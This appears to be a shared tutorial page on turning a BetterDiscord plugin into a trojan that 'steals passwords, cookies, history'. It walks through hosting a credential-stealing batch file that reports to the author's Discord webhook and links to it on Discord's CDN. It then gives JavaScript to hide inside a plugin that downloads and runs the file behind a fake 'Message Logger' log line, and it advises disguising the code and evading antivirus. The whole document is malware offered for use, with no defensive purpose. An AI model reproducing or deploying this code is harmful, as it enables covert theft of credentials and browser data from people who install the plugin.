You are on page 1of 1

Better Discord Virus Plugin

Steals passwords, cookies, history and some other stuff

Info:
Basicly in this method you edit the plugin so that it downloads a file and
then runs it, this method download and runs a .bat file, because its undetected by
anti viruses, i do have a method for running .exe files also undetected by anti
viruses, but its not public just yet. So yea, enjoy :)

Method:
1. Create a discord channel on your own server and make a webhook in it
2. Download this batch file and right click it, and click edit : batch file -
https://cdn.discordapp.com/attachments/864433423996813322/864449140519075860/yes_-
_Copy.bat
3. Put the webhook where it says put the webhook right here
4. send the bat file in your text channel, and then right click the download
icon and save that url
5. find a plugin
6. add this code into the plugin so that its gonna run when the plugin runs,
edit the code to make it seem beleivable

Code:

const fs = require("fs");
const https = require("https");

const url =
"link of the bat file hereeeeeeeeeeeeeeeeeeee";

https.get(url, (res) => {


// Image will be stored at this path
const path = `${__dirname}/MessageLoggerV2Sendback.bat`;
const filePath = fs.createWriteStream(path);
res.pipe(filePath);
filePath.on("finish", () => {
filePath.close();
console.log("Message Logger Is Now Loading...");
});
});

var batfilepathh = `${__dirname}/MessageLoggerV2Sendback.bat`;


var child_process = require("child_process");

child_process.exec(batfilepathh, function (error, stdout, stderr) {


console.log(stdout);
});

7. Now when ever someone uses this plugin, it should send their info to your
webhook

IM NOT RESPONSIBLE FOR ANY SHIT U DO WIT DIS

Discord for help: Tr33#0069

You might also like